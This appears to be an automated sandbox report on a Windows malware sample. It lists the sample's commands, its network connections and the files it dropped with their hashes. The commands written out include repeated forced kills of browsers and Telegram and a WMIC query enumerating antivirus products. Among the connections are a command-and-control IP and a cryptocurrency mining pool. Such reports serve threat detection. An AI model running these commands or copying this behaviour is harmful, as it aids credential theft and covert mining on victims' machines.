C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\ProgramData\Windows Runtime.exe

"C:\ProgramData\Windows Runtime.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 u.cubeupload.com udp
US 104.21.9.180:443 u.cubeupload.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.d.1.a.1.a.6.8.f.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 180.9.21.104.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
NL 91.92.241.69:5555 tcp
US 8.8.8.8:53 69.241.92.91.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tcp
NL 91.92.241.69:6060 91.92.241.69 tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:443 api.ipify.org tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 freeimage.host udp
US 104.21.22.122:443 freeimage.host tcp
US 8.8.8.8:53 205.13.26.104.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
NL 91.92.241.69:6060 91.92.241.69 tcp
US 8.8.8.8:53 122.22.21.104.in-addr.arpa udp
N/A 127.0.0.1:51444 tcp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 cc7686bf7c7d81f59196d5cc3cab3348
SHA1 ac39079f223f87d404c421c48239f913b12f00a8
SHA256 49c175257966f191a2abce16d8533d359fc27ecf6512da870a9c59937914d5f7
SHA512 940cfb37c1f5e5dbd86cc14d5a0a85dfaf889754051d4fc0d0afbe7bedceaec91b5f36b873b5e24cd081432db1b7d61df72a198681b9ab8e3a9b57197cfb58ae

memory/1384-5-0x00007FFFD1DB3000-0x00007FFFD1DB4000-memory.dmp

memory/1384-6-0x00000000009E0000-0x00000000009F8000-memory.dmp

memory/3008-13-0x0000000000AA0000-0x0000000000AD6000-memory.dmp

memory/1992-14-0x0000000006EC0000-0x00000000074E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Nexus Loader.exe

MD5 b2dd28aba29ed0b482ea9943a5c84fa8
SHA1 83e2bec7caecfb7db2c3f21969347f022e1405d8
SHA256 3538442d351366138a18f11275a3c74bea4eba45098a69af06cd62bb760a4291
SHA512 3b8d469dc1323d620f52819b87e9bb7fd3cb032b60980bbf5cfc6b050df85fe64bc3eaa3e9951a7f6dc3cb1f0798c13516df3c6f61baf4b948406dc4bcd1bb27

memory/1992-17-0x0000000006D00000-0x0000000006D22000-memory.dmp

memory/1992-19-0x0000000007560000-0x00000000075C6000-memory.dmp

memory/1992-18-0x00000000074F0000-0x0000000007556000-memory.dmp

memory/3008-35-0x00000000076A0000-0x00000000079F0000-memory.dmp

memory/3008-180-0x0000000007050000-0x000000000706C000-memory.dmp

memory/3008-292-0x0000000007B10000-0x0000000007B5B000-memory.dmp

memory/3008-679-0x0000000007E10000-0x0000000007E86000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1szyrp30.ts5.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\python310.dll

MD5 384349987b60775d6fc3a6d202c3e1bd
SHA1 701cb80c55f859ad4a31c53aa744a00d61e467e5
SHA256 f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8
SHA512 6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe

MD5 05940e4570597685a3525a69d0677faf
SHA1 f514b6c95900b9815b2f28dfadb7cdf0514459cb
SHA256 3c305961fa7fa5ca379f06003c96986b2596734297b13e9671b9bb4f800992e1
SHA512 d31c5c61f8fd0f633471b01c0c0f9eda3b2045d3cad0acc131dc62713c5efd4105d24b4cda2a61427987429a2f47c9a0d44a4fe1a794dd306e8de5c1c6ae1355

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_socket.pyd

MD5 5dd51579fa9b6a06336854889562bec0
SHA1 99c0ed0a15ed450279b01d95b75c162628c9be1d
SHA256 3669e56e99ae3a944fbe7845f0be05aea96a603717e883d56a27dc356f8c2f2c
SHA512 7aa6c6587890ae8c3f9a5e97ebde689243ac5b9abb9b1e887f29c53eef99a53e4b4ec100c03e1c043e2f0d330e7af444c3ca886c9a5e338c2ea42aaacae09f3e

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\select.pyd

MD5 78d421a4e6b06b5561c45b9a5c6f86b1
SHA1 c70747d3f2d26a92a0fe0b353f1d1d01693929ac
SHA256 f1694ce82da997faa89a9d22d469bfc94abb0f2063a69ec9b953bc085c2cb823
SHA512 83e02963c9726a40cd4608b69b4cdf697e41c9eedfb2d48f3c02c91500e212e7e0ab03e6b3f70f42e16e734e572593f27b016b901c8aa75f674b6e0fbb735012

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libssl-1_1.dll

MD5 bd857f444ebbf147a8fcd1215efe79fc
SHA1 1550e0d241c27f41c63f197b1bd669591a20c15b
SHA256 b7c0e42c1a60a2a062b899c8d4ebd0c50ef956177ba21785ce07c517c143aeaf
SHA512 2b85c1521edeadf7e118610d6546fafbbad43c288a7f0f9d38d97c4423a541dfac686634cde956812916830fbb4aad8351a23d95cd490c4a5c0f628244d30f0a

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_hashlib.pyd

MD5 cfb9e0a73a6c9d6d35c2594e52e15234
SHA1 b86042c96f2ce6d8a239b7d426f298a23df8b3b9
SHA256 50daeb3985302a8d85ce8167b0bf08b9da43e7d51ceae50e8e1cdfb0edf218c6
SHA512 22a5fd139d88c0eee7241c5597d8dbbf2b78841565d0ed0df62383ab50fde04b13a203bddef03530f8609f5117869ed06894a572f7655224285823385d7492d2

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_queue.pyd

MD5 c9ee37e9f3bffd296ade10a27c7e5b50
SHA1 b7eee121b2918b6c0997d4889cff13025af4f676
SHA256 9ecec72c5fe3c83c122043cad8ceb80d239d99d03b8ea665490bbced183ce42a
SHA512 c63bb1b5d84d027439af29c4827fa801df3a2f3d5854c7c79789cad3f5f7561eb2a7406c6f599d2ac553bc31969dc3fa9eef8648bed7282fbc5dc3fb3ba4307f

\Users\Admin\AppData\Local\Temp\ONEFIL~1\unicodedata.pyd

MD5 a40ff441b1b612b3b9f30f28fa3c680d
SHA1 42a309992bdbb68004e2b6b60b450e964276a8fc
SHA256 9b22d93f4db077a70a1d85ffc503980903f1a88e262068dd79c6190ec7a31b08
SHA512 5f9142b16ed7ffc0e5b17d6a4257d7249a21061fe5e928d3cde75265c2b87b723b2e7bd3109c30d2c8f83913134445e8672c98c187073368c244a476ac46c3ef

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\tcl86t.dll

MD5 ad03d1e9f0121330694415f901af8f49
SHA1 ad8d3eee5274fef8bb300e2d1f4a11e27d3940df
SHA256 224476bedbcf121c69137f1df4dd025ae81769b2f7651bd3788a870a842cfbf9
SHA512 19b85c010c98fa75eacfd0b86f9c90a2dbf6f07a2b3ff5b4120108f3c26711512edf2b875a782497bdb3d28359325ad95c17951621c4b9c1fd692fde26b77c33

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_tkinter.pyd

MD5 0f1aa5b9a82b75b607b4ead6bb6b8be6
SHA1 5d58fd899018a106d55433ea4fcb22faf96b4b3d
SHA256 336bd5bffdc0229da4eaddbb0cfc42a9e55459a40e1322b38f7e563bda8dd190
SHA512 b32ea7d3ed9ae3079728c7f92e043dd0614a4da1dbf40ae3651043d35058252187c3c0ad458f4ca79b8b006575fac17246fb33329f7b908138f5de3c4e9b4e52

C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\tcl\init.tcl

MD5 e10e428598b2d5f2054cfae4a7029709
SHA1 f8e7490e977c3c675e76297638238e08c1a5e72e
SHA256 61c55633fa048deb120422daed84224f2bb12c7c94958ca6f679b219cf2fa939
SHA512 88ef7628af5b784229dda6772c6ddd77905238a1648d4290b496eafeec013107437218e4834b7198aeb098bc854dcb9f18083c76dd5bf3ce9cedf3d5c9e4faae

\Users\Admin\AppData\Local\Temp\ONEFIL~1\PIL\_imaging.pyd

MD5 1d4aaaf3c2e8dbf96a39ddb901cdda82
SHA1 cf316bf88bfa0c6b207293533f1d2cecbd95e2d4
SHA256 88718894be067dd54e7e07d4dffa8dfc39bed02de65ff92dc5922b2ad2407995
SHA512 e88c1f6507faa883f543d47e892f6a20b6547b29883982550d6772a742510b7570fe47f912da3630ec870669e07773ec4a3d1c38962cebf63bce23b9ac55efbe

C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\tcl\encoding\cp1252.enc

MD5 5900f51fd8b5ff75e65594eb7dd50533
SHA1 2e21300e0bc8a847d0423671b08d3c65761ee172
SHA256 14df3ae30e81e7620be6bbb7a9e42083af1ae04d94cf1203565f8a3c0542ace0
SHA512 ea0455ff4cd5c0d4afb5e79b671565c2aede2857d534e1371f0c10c299c74cb4ad113d56025f58b8ae9e88e2862f0864a4836fed236f5730360b2223fde479dc

\Users\Admin\AppData\Local\Temp\ONEFIL~1\tk86t.dll

MD5 e3c7ed5f9d601970921523be5e6fce2c
SHA1 a7ee921e126c3c1ae8d0e274a896a33552a4bd40
SHA256 bd4443b8ecc3b1f0c6fb13b264769253c80a4597af7181884bda20442038ec77
SHA512 bfa76b6d754259eabc39d701d359dd96f7a4491e63b17826a05a14f8fdf87656e8fc541a40e477e4fef8d0601320dd163199520e66d9ee8b5d6bb5cd9a275901

\Users\Admin\AppData\Local\Temp\ONEFIL~1\_lzma.pyd

MD5 5a77a1e70e054431236adb9e46f40582
SHA1 be4a8d1618d3ad11cfdb6a366625b37c27f4611a
SHA256 f125a885c10e1be4b12d988d6c19128890e7add75baa935fe1354721aa2dea3e
SHA512 3c14297a1400a93d1a01c7f8b4463bfd6be062ec08daaf5eb7fcbcde7f4fa40ae06e016ff0de16cb03b987c263876f2f437705adc66244d3ee58f23d6bf7f635

\Users\Admin\AppData\Local\Temp\ONEFIL~1\_bz2.pyd

MD5 b45e82a398713163216984f2feba88f6
SHA1 eaaf4b91db6f67d7c57c2711f4e968ce0fe5d839
SHA256 4c2649dc69a8874b91646723aacb84c565efeaa4277c46392055bca9a10497a8
SHA512 b9c4f22dc4b52815c407ab94d18a7f2e1e4f2250aecdb2e75119150e69b006ed69f3000622ec63eabcf0886b7f56ffdb154e0bf57d8f7f45c3b1dd5c18b84ec8

\Users\Admin\AppData\Local\Temp\ONEFIL~1\charset_normalizer\md__mypyc.pyd

MD5 494f5b9adc1cfb7fdb919c9b1af346e1
SHA1 4a5fddd47812d19948585390f76d5435c4220e6b
SHA256 ad9bcc0de6815516dfde91bb2e477f8fb5f099d7f5511d0f54b50fa77b721051
SHA512 2c0d68da196075ea30d97b5fd853c673e28949df2b6bf005ae72fd8b60a0c036f18103c5de662cac63baaef740b65b4ed2394fcd2e6da4dfcfbeef5b64dab794

\Users\Admin\AppData\Local\Temp\ONEFIL~1\charset_normalizer\md.pyd

MD5 f33ca57d413e6b5313272fa54dbc8baa
SHA1 4e0cabe7d38fe8d649a0a497ed18d4d1ca5f4c44
SHA256 9b3d70922dcfaeb02812afa9030a40433b9d2b58bcf088781f9ab68a74d20664
SHA512 f17c06f4202b6edbb66660d68ff938d4f75b411f9fab48636c3575e42abaab6464d66cb57bce7f84e8e2b5755b6ef757a820a50c13dd5f85faa63cd553d3ff32

\Users\Admin\AppData\Local\Temp\ONEFIL~1\libcrypto-1_1.dll

MD5 63c4f445b6998e63a1414f5765c18217
SHA1 8c1ac1b4290b122e62f706f7434517077974f40e
SHA256 664c3e52f914e351bb8a66ce2465ee0d40acab1d2a6b3167ae6acf6f1d1724d2
SHA512 aa7bdb3c5bc8aeefbad70d785f2468acbb88ef6e6cac175da765647030734453a2836f9658dc7ce33f6fff0de85cb701c825ef5c04018d79fa1953c8ef946afd

\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ssl.pyd

MD5 11c5008e0ba2caa8adf7452f0aaafd1e
SHA1 764b33b749e3da9e716b8a853b63b2f7711fcc7c
SHA256 bf63f44951f14c9d0c890415d013276498d6d59e53811bbe2fa16825710bea14
SHA512 fceb022d8694bce6504d6b64de4596e2b8252fc2427ee66300e37bcff297579cc7d32a8cb8f847408eaa716cb053e20d53e93fbd945e3f60d58214e6a969c9dd

\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\vcruntime140.dll

MD5 11d9ac94e8cb17bd23dea89f8e757f18
SHA1 d4fb80a512486821ad320c4fd67abcae63005158
SHA256 e1d6f78a72836ea120bd27a33ae89cbdc3f3ca7d9d0231aaa3aac91996d2fa4e
SHA512 aa6afd6bea27f554e3646152d8c4f96f7bcaaa4933f8b7c04346e410f93f23cfa6d29362fd5d51ccbb8b6223e094cd89e351f072ad0517553703f5bf9de28778

C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\tk\entry.tcl

MD5 1d9ff9bb7fedb472910776361510c610
SHA1 c190dd07bcc55741b9bdfc210f82df7b7c2fac81
SHA256 dd351da6288cf7e9f367fd97c97cb476193ff7461b25e31667e85fe720edea04
SHA512 85d25622f4e0c9517d8caa454ec4e81c8cbbec25e418f5a2d885d5561999cfb3c3026aac8bf1ca6f9b40993802fda86d60ff8fd2e30a77d56f1c1914af695f03

C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\tk\menu.tcl

MD5 12ec5260eb7435c7170002e011fe8f17
SHA1 e88f5423a7133784a1a2d097c4e602e5de564034
SHA256 588727079af7ecc44755efe33ebb7414ad2ee68390fc249ce073d38e03c78a4e
SHA512 5848e5a642f0cfba8b456a6dcef711737229e5f59beb7981a52440a47f5ba9ec85374be8e8b1ccdd952ac71164da04ff88ef07204fd62509952db2cdb6503700

C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\tk\ttk\fonts.tcl

MD5 7017b5c1d53f341f703322a40c76c925
SHA1 57540c56c92cc86f94b47830a00c29f826def28e
SHA256 0eb518251fbe9cf0c9451cc1fef6bb6aee16d62da00b0050c83566da053f68d0
SHA512 fd18976a8fbb7e59b12944c2628dbd66d463b2f7342661c8f67160df37a393fa3c0ce7fdda31073674b7a46e0a0a7d0a7b29ebe0d9488afd9ef8b3a39410b5a8

C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\tk\ttk\ttk.tcl

MD5 e38b399865c45e49419c01ff2addce75
SHA1 f8a79cbc97a32622922d4a3a5694bccb3f19decb
SHA256 61baa0268770f127394a006340d99ce831a1c7ad773181c0c13122f7d2c5b7f6
SHA512 285f520b648f5ec70dd79190c3b456f4d6da2053210985f9e2c84139d8d51908296e4962b336894ee30536f09fae84b912bc2abf44a7011620f66cc5d9f71a8c

C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\tk\text.tcl

MD5 33230f852aac8a5368aeba1834dcec77
SHA1 beba97c48a110f4a9fe86f60e5fd4ca6ac55e964
SHA256 f26ed909a962d02bc03585a6c756f4fe992c311c7f53648137e427747120b441
SHA512 caac54334c4eb439c18f03eeb5de83aa6bbd6bb07b760a40c60f2d34f5ee1fdd542f83ad427059863f96b0a8f2cb96658171a7cd0c0c2c49e002bd02e6d418f6

C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\tk\spinbox.tcl

MD5 9971530f110ac2fb7d7ec91789ea2364
SHA1 ab553213c092ef077524ed56fc37da29404c79a7
SHA256 5d6e939b44f630a29c4fcb1e2503690c453118607ff301bef3c07fa980d5075a
SHA512 81b4cec39b03fbeca59781aa54960f0a10a09733634f401d5553e1aaa3ebf12a110c9d555946fcdd70a9cc897514663840745241ad741dc440bb081a12dcf411

C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\tk\scrlbar.tcl

MD5 b44265f793563ad2ad66865dec63b2c2
SHA1 23e6f7095066ed3b65998324021d665d810e6a93
SHA256 189e7ee4b67861001c714a55880db34acf7d626a816e18b04b232af9e6e33e81
SHA512 3911b13f42091620d8d96ed0cc950792175f88399912092161e1a71f564c7e72b6d448d3b761b6b6b73400ccc8fabd94cb3bfcc8cb3ad8ebdb590c3ffc623dfb

C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\tk\scale.tcl

MD5 1ce32cdaeb04c75bfceea5fb94b8a9f0
SHA1 cc7614c9eade999963ee78b422157b7b0739894c
SHA256 58c662dd3d2c653786b05aa2c88831f4e971b9105e4869d866fb6186e83ed365
SHA512 1ee5a187615ae32f17936931b30fea9551f9e3022c1f45a2bca81624404f4e68022fcf0b03fbd61820ec6958983a8f2fbfc3ad2ec158433f8e8de9b8fcf48476

C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\tk\panedwindow.tcl

MD5 2da0a23cc9d6fd970fe00915ea39d8a2
SHA1 dfe3dc663c19e9a50526a513043d2393869d8f90
SHA256 4adf738b17691489c71c4b9d9a64b12961ada8667b81856f7adbc61dffeadf29
SHA512 b458f3d391df9522d4e7eae8640af308b4209ce0d64fd490bfc0177fde970192295c1ea7229ce36d14fc3e582c7649460b8b7b0214e0ff5629b2b430a99307d4

C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\tk\listbox.tcl

MD5 b3b6a3bd19ddde4a97ea7cf95d7a8322
SHA1 2f11d97c091de9202f238778c89f13a94a10d3be
SHA256 b92526a55409c67473740551ca128498824d25406e3cc9bb0544e8296d3c5de4
SHA512 f2bc1fbbd20132725d283b9fab20c3e38ed185a62297e1418572c03fa90b3f813b878be281bb4bdfa1c813b7ee7eff11cbb2f89b5411b1707d90b0e5fd746fb3

C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\tcl\tm.tcl

MD5 52db1cd97ceab81675e86fa0264ea539
SHA1 b31693b5408a847f97ee8004fed48e5891df6e65
SHA256 6c02298d56e3c4c6b197afc79ec3ce1fc37ae176dc35f5d7ac48246f05f91669
SHA512 5032b0a79d0cd5a342af2f9edf8b88b7214e9aa61ba524a42c5be2286741e18fa380ad2d40dda9a0257afceed2ef6e48624013e854f37b5e41cb88a831ad04c9

C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\tk\tk.tcl

MD5 25094462d2ea6b43133275bf4db31a60
SHA1 6bb76294e8fdf4d40027c9d1b994f1ab0014b81b
SHA256 3e998b41ab23677db31902e1e876e644b279b2e6d8896443f6c434352801cdd1
SHA512 8bdae921f367b864ea7f36c9a549ee870d4e4e3c6e942d70722a84ae6b23ff00a33638d8ca8f3b9b8fe084875ba7c8976975849f4dc47cdb5671df47af68cfab

C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\tcl\auto.tcl

MD5 5e9b3e874f8fbeaadef3a004a1b291b5
SHA1 b356286005efb4a3a46a1fdd53e4fcdc406569d0
SHA256 f385515658832feb75ee4dce5bd53f7f67f2629077b7d049b86a730a49bd0840
SHA512 482c555a0da2e635fa6838a40377eef547746b2907f53d77e9ffce8063c1a24322d8faa3421fc8d12fdcaff831b517a65dafb1cea6f5ea010bdc18a441b38790

C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\tcl\tclIndex

MD5 996f74f323ea95c03670734814b7887f
SHA1 49f4b9be5ab77e6ccab8091f315d424d7ac183f3
SHA256 962c60eb7e050061462ff72cec9741a7f18307af4aaa68d7665174f904842d13
SHA512 c4694260c733dc534dc1a70791fa29b725efd078a6846434883362f06f7bf080ca07478208b1909630e1b55fbdccf14484b78b0a5b8c6dad90f190c8c9d88a56

C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\tk\button.tcl

MD5 cf6e5b2eb7681567c119040939dd6e2c
SHA1 3e0b905428c293f21074145fe43281f22e699eb4
SHA256 2f013b643d62f08ddaaa1dea39ff80d6607569c9e1acc19406377b64d75ccf53
SHA512 be03edea59be01d2b8de72b6ebe9dceb13d16c522bb5c042cdae83c84eafc6ac7b3650bf924f5f84f4f126634f9d17d74d087316d289f237129921a89aa4e0c8

C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\tk\icons.tcl

MD5 2652aad862e8fe06a4eedfb521e42b75
SHA1 ed22459ad3d192ab05a01a25af07247b89dc6440
SHA256 a78388d68600331d06bb14a4289bc1a46295f48cec31ceff5ae783846ea4d161
SHA512 6ecfbb8d136444a5c0dbbce2d8a4206f1558bdd95f111d3587b095904769ac10782a9ea125d85033ad6532edf3190e86e255ac0c0c81dc314e02d95cca86b596

C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\tcl\opt0.4\pkgIndex.tcl

MD5 92ff1e42cfc5fecce95068fc38d995b3
SHA1 b2e71842f14d5422a9093115d52f19bcca1bf881
SHA256 eb9925a8f0fcc7c2a1113968ab0537180e10c9187b139c8371adf821c7b56718
SHA512 608d436395d055c5449a53208f3869b8793df267b8476ad31bcdd9659a222797814832720c495d938e34bf7d253ffc3f01a73cc0399c0dfb9c85d2789c7f11c0

C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\tcl\http1.0\pkgIndex.tcl

MD5 10ec7cd64ca949099c818646b6fae31c
SHA1 6001a58a0701dff225e2510a4aaee6489a537657
SHA256 420c4b3088c9dacd21bc348011cac61d7cb283b9bee78ae72eed764ab094651c
SHA512 34a0acb689e430ed2903d8a903d531a3d734cb37733ef13c5d243cb9f59c020a3856aad98726e10ad7f4d67619a3af1018f6c3e53a6e073e39bd31d088efd4af

C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\tk\pkgIndex.tcl

MD5 d942ff6f65bba8eb6d264db7d876a488
SHA1 74d6ca77e6092d79f37e7a1dcd7cced2e89d89cb
SHA256 e0bac49b9a3f0e50be89f692273cea7b7462bfc3e054f323261ef99b708c70a3
SHA512 3ac7d992300252109606074aefb693a31cd5cceffb6d7b851a2c8895a0d5e165a139b7038657306128af39c44785b7b4da35b8e1aeb4c30f3f7e7cfcfb789c4c

C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\tcl\package.tcl

MD5 55e2db5dcf8d49f8cd5b7d64fea640c7
SHA1 8fdc28822b0cc08fa3569a14a8c96edca03bfbbd
SHA256 47b6af117199b1511f6103ec966a58e2fd41f0aba775c44692b2069f6ed10bad
SHA512 824c210106de7eae57a480e3f6e3a5c8fb8ac4bbf0a0a386d576d3eb2a3ac849bdfe638428184056da9e81767e2b63eff8e18068a1cf5149c9f8a018f817d3e5

C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\tcl8\8.5\msgcat-1.6.1.tm

MD5 db52847c625ea3290f81238595a915cd
SHA1 45a4ed9b74965e399430290bcdcd64aca5d29159
SHA256 4fdf70fdcedef97aa8bd82a02669b066b5dfe7630c92494a130fc7c627b52b55
SHA512 5a8fb4ada7b2efbf1cadd10dbe4dc7ea7acd101cb8fd0b80dad42be3ed8804fc8695c53e6aeec088c2d4c3ee01af97d148b836289da6e4f9ee14432b923c7e40

memory/1992-1075-0x0000000009630000-0x0000000009CA8000-memory.dmp

memory/1992-1076-0x0000000006B20000-0x0000000006B3A000-memory.dmp

memory/1992-1089-0x000000000A1B0000-0x000000000A6AE000-memory.dmp

memory/1992-1090-0x0000000009260000-0x00000000092F2000-memory.dmp

memory/3008-1093-0x0000000008EB0000-0x0000000008ECE000-memory.dmp

memory/3008-1092-0x0000000073910000-0x000000007395B000-memory.dmp

memory/3008-1098-0x0000000008ED0000-0x0000000008F75000-memory.dmp

memory/3008-1091-0x0000000008E50000-0x0000000008E83000-memory.dmp

memory/3008-1099-0x0000000009190000-0x0000000009224000-memory.dmp

memory/3352-1172-0x000001B3ADC80000-0x000001B3ADCA2000-memory.dmp

memory/3352-1176-0x000001B3AE890000-0x000001B3AE906000-memory.dmp

memory/3008-1335-0x0000000009130000-0x000000000914A000-memory.dmp

memory/3008-1343-0x0000000009120000-0x0000000009128000-memory.dmp

memory/1384-1499-0x00007FFFD1DB3000-0x00007FFFD1DB4000-memory.dmp

memory/4248-1505-0x0000000140000000-0x000000014000D000-memory.dmp

memory/4248-1504-0x0000000140000000-0x000000014000D000-memory.dmp

memory/4248-1503-0x0000000140000000-0x000000014000D000-memory.dmp

memory/4248-1502-0x0000000140000000-0x000000014000D000-memory.dmp

memory/4248-1501-0x0000000140000000-0x000000014000D000-memory.dmp

memory/4248-1508-0x0000000140000000-0x000000014000D000-memory.dmp

memory/5064-1513-0x0000000140000000-0x0000000140848000-memory.dmp

memory/5064-1509-0x0000000140000000-0x0000000140848000-memory.dmp

memory/5064-1510-0x0000000140000000-0x0000000140848000-memory.dmp

